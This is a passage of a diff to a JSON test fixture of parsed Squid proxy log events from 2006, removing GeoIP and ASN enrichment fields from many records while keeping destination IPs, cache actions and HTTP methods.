         "destination.ip": "207.58.145.61",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -611,16 +547,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:05.000Z",
-        "destination.as.number": 30633,
-        "destination.as.organization.name": "Leaseweb USA, Inc.",
-        "destination.geo.city_name": "Falls Church",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.9307,
-        "destination.geo.location.lon": -77.1673,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "207.58.145.61",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -743,16 +669,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:05.000Z",
-        "destination.as.number": 36351,
-        "destination.as.organization.name": "SoftLayer Technologies Inc.",
-        "destination.geo.city_name": "Dallas",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 32.9379,
-        "destination.geo.location.lon": -96.8384,
-        "destination.geo.region_iso_code": "US-TX",
-        "destination.geo.region_name": "Texas",
         "destination.ip": "209.85.16.38",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -815,11 +731,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:06.000Z",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.213.132",
         "event.action": "TCP_MISS",
         "event.code": "CONNECT",
@@ -877,13 +788,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:07.000Z",
-        "destination.as.number": 1299,
-        "destination.as.organization.name": "Telia Company AB",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "SE",
-        "destination.geo.country_name": "Sweden",
-        "destination.geo.location.lat": 59.3247,
-        "destination.geo.location.lon": 18.056,
         "destination.ip": "217.212.240.172",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -945,16 +849,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:07.000Z",
-        "destination.as.number": 3549,
-        "destination.as.organization.name": "Level 3 Parent, LLC",
-        "destination.geo.city_name": "Los Angeles",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 34.0675,
-        "destination.geo.location.lon": -118.3521,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "206.169.136.22",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -1078,16 +972,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:09.000Z",
-        "destination.as.number": 30633,
-        "destination.as.organization.name": "Leaseweb USA, Inc.",
-        "destination.geo.city_name": "Falls Church",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.9307,
-        "destination.geo.location.lon": -77.1673,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "207.58.145.61",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -1150,16 +1034,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:09.000Z",
-        "destination.as.number": 30633,
-        "destination.as.organization.name": "Leaseweb USA, Inc.",
-        "destination.geo.city_name": "Falls Church",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.9307,
-        "destination.geo.location.lon": -77.1673,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "207.58.145.61",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -1222,11 +1096,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:10.000Z",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "64.127.126.178",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -1290,16 +1159,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:11.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.161",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -1362,16 +1221,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:15.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.160",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -1490,13 +1339,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:22.000Z",
-        "destination.as.number": 36752,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "209.73.177.115",
         "event.action": "TCP_MISS",
         "event.code": "CONNECT",
@@ -1614,13 +1456,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:23.000Z",
-        "destination.as.number": 36646,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "216.155.194.239",
         "event.action": "TCP_MISS",
         "event.code": "POST",
@@ -1680,16 +1515,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:24.000Z",
-        "destination.as.number": 36077,
-        "destination.as.organization.name": "Dynamic ASP Inc.",
-        "destination.geo.city_name": "Victoria",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "CA",
-        "destination.geo.country_name": "Canada",
-        "destination.geo.location.lat": 48.4267,
-        "destination.geo.location.lon": -123.3655,
-        "destination.geo.region_iso_code": "CA-BC",
-        "destination.geo.region_name": "British Columbia",
         "destination.ip": "204.13.51.238",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -1748,16 +1573,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:24.000Z",
-        "destination.as.number": 36077,
-        "destination.as.organization.name": "Dynamic ASP Inc.",
-        "destination.geo.city_name": "Victoria",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "CA",
-        "destination.geo.country_name": "Canada",
-        "destination.geo.location.lat": 48.4267,
-        "destination.geo.location.lon": -123.3655,
-        "destination.geo.region_iso_code": "CA-BC",
-        "destination.geo.region_name": "British Columbia",
         "destination.ip": "204.13.51.238",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -1818,13 +1633,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:25.000Z",
-        "destination.as.number": 36646,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "216.155.194.239",
         "event.action": "TCP_MISS",
         "event.code": "POST",
@@ -2064,16 +1872,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:27.000Z",
-        "destination.as.number": 36077,
-        "destination.as.organization.name": "Dynamic ASP Inc.",
-        "destination.geo.city_name": "Victoria",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "CA",
-        "destination.geo.country_name": "Canada",
-        "destination.geo.location.lat": 48.4267,
-        "destination.geo.location.lon": -123.3655,
-        "destination.geo.region_iso_code": "CA-BC",
-        "destination.geo.region_name": "British Columbia",
         "destination.ip": "204.13.51.238",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -2132,16 +1930,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:29.000Z",
-        "destination.as.number": 36077,
-        "destination.as.organization.name": "Dynamic ASP Inc.",
-        "destination.geo.city_name": "Victoria",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "CA",
-        "destination.geo.country_name": "Canada",
-        "destination.geo.location.lat": 48.4267,
-        "destination.geo.location.lon": -123.3655,
-        "destination.geo.region_iso_code": "CA-BC",
-        "destination.geo.region_name": "British Columbia",
         "destination.ip": "204.13.51.238",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -2202,13 +1990,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:30.000Z",
-        "destination.as.number": 36646,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "216.155.194.239",
         "event.action": "TCP_MISS",
         "event.code": "POST",
@@ -2268,11 +2049,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:33.000Z",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.194.14",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -2334,13 +2110,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:33.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -2403,13 +2172,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:34.000Z",
-        "destination.as.number": 36646,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "216.155.194.239",
         "event.action": "TCP_MISS",
         "event.code": "POST",
@@ -2469,11 +2231,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:35.000Z",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "209.191.93.51",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -2536,16 +2293,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:36.000Z",
-        "destination.as.number": 36856,
-        "destination.as.organization.name": "Mozilla Corporation",
-        "destination.geo.city_name": "Sacramento",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6415,
-        "destination.geo.location.lon": -121.5114,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "63.245.209.21",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -2608,13 +2355,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:37.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.231.252",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -2676,11 +2416,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:37.000Z",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.194.14",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -2970,13 +2705,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:38.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -3094,13 +2822,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:39.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -3163,13 +2884,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:39.000Z",
-        "destination.as.number": 36646,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "216.155.194.239",
         "event.action": "TCP_MISS",
         "event.code": "POST",
@@ -3229,13 +2943,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:39.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -3298,13 +3005,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:40.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -3485,13 +3185,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:41.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -3554,13 +3247,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:41.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -3623,13 +3309,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:42.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -3692,13 +3371,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:42.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -3941,13 +3613,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:43.000Z",
-        "destination.as.number": 2818,
-        "destination.as.organization.name": "BBC",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.4964,
-        "destination.geo.location.lon": -0.1224,
         "destination.ip": "212.58.226.33",
         "event.action": "TCP_REFRESH_MISS",
         "event.code": "GET",
@@ -4010,13 +3675,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:44.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.231.252",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -4199,13 +3857,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:45.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_MISS",
         "event.code": "POST",
@@ -4267,16 +3918,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:46.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.159",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -4339,13 +3980,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:48.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -4409,13 +4043,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:48.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -4479,13 +4106,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:48.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -4671,16 +4291,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:50.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.159",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -4743,13 +4353,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:50.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -4813,13 +4416,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:51.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -4883,16 +4479,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:51.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.152",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -4956,13 +4542,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:53.000Z",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.219.132",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -5026,11 +4605,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:54.000Z",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.213.132",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -5093,11 +4667,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:56.000Z",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "68.142.194.14",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -5161,11 +4730,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:57.000Z",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "216.109.124.55",
         "event.action": "TCP_MISS",
         "event.code": "CONNECT",
@@ -5283,16 +4847,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:57.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.159",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -5355,16 +4909,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:58.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.159",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -5427,13 +4971,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:58.000Z",
-        "destination.as.number": 36752,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "209.73.177.115",
         "event.action": "TCP_MISS",
         "event.code": "CONNECT",
@@ -5491,16 +5028,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:58.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.167",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -5563,16 +5090,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:58.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.159",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -5695,16 +5212,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:59.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.167",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -5767,16 +5274,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:59.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.159",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -5839,16 +5336,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:23:00.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.167",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -6031,11 +5518,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:23:01.000Z",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "216.109.125.112",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -6098,13 +5580,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:23:02.000Z",
-        "destination.as.number": 34010,
-        "destination.as.organization.name": "Yahoo! UK Services Limited",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
